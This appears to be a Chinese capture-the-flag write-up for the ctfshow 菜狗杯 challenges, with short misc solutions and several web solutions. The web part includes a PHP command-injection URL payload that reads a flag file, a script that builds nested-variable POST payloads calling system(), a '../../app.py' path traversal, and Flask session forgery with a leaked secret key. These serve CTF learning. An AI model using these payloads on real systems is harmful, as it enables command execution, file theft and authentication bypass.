ctfshow-菜狗杯WP
杂项
我是谁?
直接对照列表做就行了,就是有些费眼睛
You and me
利用BlindWatermark-master将两张图片作为输入,输出盲水印即可
7.1.05
附件.SAV文件显然是一个游戏存档
通过搜索提示中的QQ号754365305可知该游戏是金融帝国
而题目名7.1.05显然是一个版本号
可知应该要下载该游戏的对应版本,然后载入游戏文档
按这个思路进到游戏里面根据提示一步步获得flag即可
黑丝白丝还有什么丝
题目提示是莫斯密码
对着题目敲摩斯密码
.-- ....- -. - - ----- -... ...-- -- --- .-. . -.-. ..- - .
用摩斯密码翻译工具翻译出来就是flag
我吐了你随意
由文件名提示可知是零宽隐写
把文本复制,然后去翻就行辽
迅疾响应
二维码扫不出来滴
得用qrazybox
[QRazyBox在线地址]((https://merricx.github.io/qrazybox/)
载入图片

使用右上角的tools中的Extract QR Information
得到前半部分flag

得到前半部分flag
下面的步骤就很神仙了,思路相对清奇,不看官方wp确实难做
用左侧的画笔把左侧纠错区涂白

之后再extract一下就可以了

最终flag为:ctfshow{11451419-1981-landexiangle}
打不开的图片
png图片前四个字节的十六进制值为
89 50 4E 47
而用010editor打开该图片发现其前四个字节的十六进制与本来应该是的值相加为100,故这里运用到求反运算
之后即可打开图片获得flag
web
web签到
把payload贴在下面
https://7547cfec-75c7-476c-8109-d1400777247b.challenge.ctf.show/?b=c&c[0]=1&c[6][0][7][5][8][0][9][4][4]=system("cat /f1agaaa");
post: a=b
cookie:CTFshow-QQ群:=a
刚开始没成功,后来发现得用edge的hackbar不行,得用Chrome的hackbar才能成功,也是有些莫名其妙的
我的眼里只有$

这道题考察的是变量的嵌套
所以我们得把一层层地递推出最深一层是的变量名
count = (len(input("请输入字符串:")))
result = "_=a0"
for i in range(count - 2):
result += '&' + 'a' + str(i) + '=' + 'a' + str(i + 1)
result += '&a' + str(count - 2) + '=' + 'system("ls /");'
print(f'输出结果是{result}:')
将输出结果用hackbar的post方法发送找到flag

最后再将"ls /"换成"cat /f*"即可获得flag
抽老婆
首先开抽试一下

挺好康的
简单浏览可以知道,这道题的重点并不在于图片
所以我们打开源码康康

出现了超可疑的链接:
/download?file=
所以我们尝试一下将file赋值成flag,但是没有成功
我们再尝试一张可能不存在的照片
就比如这样子"download?file=1.png"

发现页面使用了app.py文件,尝试把它下载下来
直接把路径复制下来找找看

根据报错信息可知,这里用到了路径的拼接
所以我们将file赋值为"../../app.py"

打开文件
发现如果想拿到flag得执行getflag函数,而且得满足session值为'isadmin'
生成session所需秘钥也是可以找到的

所以利用flask_session_cookie_manager3.py工具脚本进行flask session伪造
python3 flask_session_cookie_manager3.py encode -t "{'isadmin':True}" -s "tanji_is_A_boy_Yooooooooooooooooooooo!"
得到session值:
eyJpc2FkbWluIjp0cnVlfQ.ZmufEg.vF6jyYAmenDHHQ6L9EyqeaYZqTM
利用该cookie值访问/secret_path_U_never_know即可获得flag
一言既出

对PHP代码进行分析


浙公网安备 33010602011771号